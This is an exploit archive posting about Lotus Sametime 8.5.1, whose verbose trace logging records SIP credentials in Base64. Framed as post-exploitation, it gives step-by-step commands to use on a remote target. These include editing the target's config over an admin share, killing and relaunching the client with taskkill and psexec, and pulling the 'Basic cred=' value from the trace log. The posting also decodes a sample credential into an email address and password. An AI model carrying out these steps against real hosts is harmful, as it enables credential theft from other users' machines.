exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Lotus Sametime 8.5.1 Password Disclosure

Lotus Sametime 8.5.1 Password Disclosure
Posted Feb 21, 2014
Authored by Adriano Marcio Monteiro

Verbose logging in Lotus Sametime version 8.5.1 logs a user password simply base64 encoded.

tags | exploit, info disclosure
SHA-256 | 83a7b3d0184d9980f17866ccfef1a87269f5a9bffc36ad1349b83d3f04116a88
Download | Favorite | View

Lotus Sametime 8.5.1 Password Disclosure

Change Mirror Download
# Exploit Title:  Post Exploitation - Getting username and password in the Lotus Sametime 8.5.1
# Google Dork:     n/a
# Date:     18/02/2014
# Exploit Author:  Adriano Marcio Monteiro <adrianomarciomonteiro@gmail.com>
# Vendor Homepage:   http://www.ibm.com/us/en/
# Software Link:   http://www-01.ibm.com/support/docview.wss?uid=swg24027054
# Version:     8.5.1
# Tested on:     Windows 7 SP1 x86 pt-br
# CVE :      

Lotus Sametime is an instant messaging application that includes several features such as video conferencing, phone calls, etc. .. In case of problems the Lotus Sametime provides functionality to register and trace log (Menu: Help / Support / Show Tracker). When you enable verbose logging is possible to obtain the user and the user's password (the password is in Base64), according to the procedure below. The vulnerability is in telephony.softphone.service more specifically in Source Class.Method:

  com.ibm.ws.sip.stack.transport.TransportLayer
  sendMessage

Communication with the server is done via TLS, but the local content communication log is saved in clear text and the password is in base 64. Sample log:

  Out Message: [172.29.1.121:62444->172.28.10.138:5081/TLS]
  REGISTER sip:sipserver.meudominio.com.br:5081;transport=tls SIP/2.0
  Call-ID: 0.CA3.11C8340A9391D37E@172.29.1.121
  CSeq: 1 REGISTER
  From: <sips:adriano.monteiro%40meudominio.com.br@sipserver.meudominio.com.br:5081>;tag=3996.696000502281
  To: sips:adriano.monteiro%40meudominio.com.br@sipserver.meudominio.com.br:5081
  Via: SIP/2.0/TLS 172.29.1.121:5061;branch=z9hG4bK-6283666955645770411
  Max-Forwards: 70  
  Contact: sip:172.29.1.121:5061;transport=tls
  Expires: 0
  User-Agent: Sametime-Softphone-8.5.1.20100709-0934
  Allow: INVITE, ACK, CANCEL, BYE, NOTIFY, INFO, MESSAGE, UPDATE
  Authorization: Basic cred="YWRyaWFuby5tb250ZWlyb0BtZXVkb21pbmlvLmNvbS5icjpBbW9yMTAxMA=="
  Content-Length: 0

Using a simple script you can automate the process of getting username and password, but beyond the scope of this tutorial and I will not explain this process here. Use your imagination!

PoC - Proof of Concept

Find the file below:
  “\\host.alvo\c$\Users\<usuario.alvo>\Dados de Aplicativos\Lotus\Sametime\.config\rcpinstall.properties”

Add the following lines at the end of the file and save:
  com.ibm.collaboration.realtime.internal.telephony.level=FINE
  com.ibm.collaboration.realtime.telephony.ui.level=FINE
  com.ibm.collaboration.realtime.telephony.tcspi.level=FINEST
  com.ibm.collaboration.realtime.telephony.softphone.level=FINER
  com.ibm.collaboration.realtime.telephony.core.level=FINE
  com.ibm.collaboration.realtime.multimedia.phonegrid.level=FINE
  com.ibm.collaboration.realtime.multimedia.video.gips.level=FINE
  com.ibm.collaboration.realtime.multimedia.phonegrid.internal.gips.level=FINE
  com.ibm.collaboration.realtime.multimedia.video.gips.level=FINE
  com.ibm.collaboration.realtime.multimedia.phonegrid.internal.gips.level=FINE
  com.ibm.collaboration.realtime.telephony.core.level=FINE
  com.ibm.collaboration.realtime.telephony.tcspi.level=FINEST
  com.ibm.collaboration.realtime.telephony.softphone.level=FINER
  com.ibm.collaboration.realtime.internal.telephony.level=FINE
  com.ibm.collaboration.realtime.telephony.ui.level=FINE
  com.ibm.collaboration.realtime.multimedia.level=FINE
  com.ibm.collaboration.realtime.internal.telephony.level=FINE
  com.ibm.collaboration.realtime.telephony.level=FINE
  com.ibm.collaboration.realtime.telephony.tcspi.level=FINEST
  com.ibm.collaboration.realtime.telephony.softphone.level=FINER

Restarting the process on the target host:
  taskkill /s host.alvo /f /im sametime.exe
  psexec –d \\host.alvo cmd.exe /c "%ProgramFiles%\IBM\Lotus\Sametime Connect\rcp\rcplauncher.exe"

In the logs folder:
  \\host.alvo\c$\Users\<usuario.alvo>\Dados de aplicativos\Lotus\Sametime\logs

Access the file:
  trace-log-0.xml

Search for:
  Basic cred=

Example:
<CommonBaseEvent creationTime="2014-02-18T11:44:53.249-03:00" globalInstanceId="ELac1d017d00014445744cd800001c7e" msg="Out Message: [172.29.1.125:58008->172.28.10.138:5081/TLS]&#xD;&#xA;REGISTER sip:server.meudominio.com.br:5081;transport=tls SIP/2.0&#xD;&#xA;Call-ID: 0.94.52A702A8618A2FE8@172.29.1.125&#xD;&#xA;CSeq: 1 REGISTER&#xD;&#xA;From:<sips:adriano.monteiro%40meudominio.com.br@server.meudominio.com.br:5081>;tag=4518.144797347828&#xD;&#xA;To: <sips:adriano.monteiro%40meudominio.com.br@server.meudominio.com.br:5081>&#xD;&#xA;Via: SIP/2.0/TLS 172.29.1.125:5061;branch=z9hG4bK-3811914127572726454&#xD;&#xA;Max-Forwards:70&#xD;&#xA;Contact: *&#xD;&#xA;Expires: 0&#xD;&#xA;User-Agent: Sametime-Softphone-8.5.1.20100709-0934&#xD;&#xA;Allow: INVITE, ACK, CANCEL, BYE, NOTIFY, INFO, MESSAGE,UPDATE&#xD;&#xA;
Authorization: Basic cred="YWRyaWFuby5tb250ZWlyb0BtZXVkb21pbmlvLmNvbS5icjpBbW9yMTAxMA=="&#xD;&#xA;Content-Length: 0&#xD;&#xA;&#xD;&#xA;"   severity="10" version="1.0.1">

The username and password found here:
  Authorization: Basic cred="YWRyaWFuby5tb250ZWlyb0BtZXVkb21pbmlvLmNvbS5icjpBbW9yMTAxMA=="

Getting Username and Password:
  Site:    http://www.base64decode.org/
  Decode:    YWRyaWFuby5tb250ZWlyb0BtZXVkb21pbmlvLmNvbS5icjpBbW9yMTAxMA==
  Result:    adriano.monteiro@meudominio.com.br:Amor1010

Bibliography:
http://pic.dhe.ibm.com/infocenter/sametime/v8r5/index.jsp?topic=%2Fcom.ibm.help.sametime.v85.doc%2Ftrouble%2Ftrbl_client_log_trace.html

[end]
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close